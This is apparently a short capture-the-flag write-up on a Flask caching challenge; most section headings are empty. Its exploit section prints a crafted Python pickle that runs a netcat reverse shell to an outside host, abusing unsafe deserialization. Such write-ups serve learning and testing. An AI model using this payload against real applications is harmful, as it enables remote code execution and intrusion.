CTF Flask Caching

Introduction

Code Analysis and Observed Behavior of Application

The Exploit

Funnily enough, after trying multiple different nonfunctional payloads, our answer was found within the OFFICIAL python3 documentation on pickles. This link shows how a pretty compact looking pickle lets us import and execute shellcode using the os module. Below is a form of this pickle that has been crafted to connect to a DO Droplet:

pickle

!cos                                                                                                                      
system                                                                                                                    
(S'nc REDACTED-IP 6969 -e /bin/sh'
tR.%  

One question that we had while crafting this pickle was whether or not the challenge was intended to be solved in such a way and if there was a better approach than this one. Nevertheless, a shell is always a nice thing to have :)

Gaining Shell Access and Finding the Flag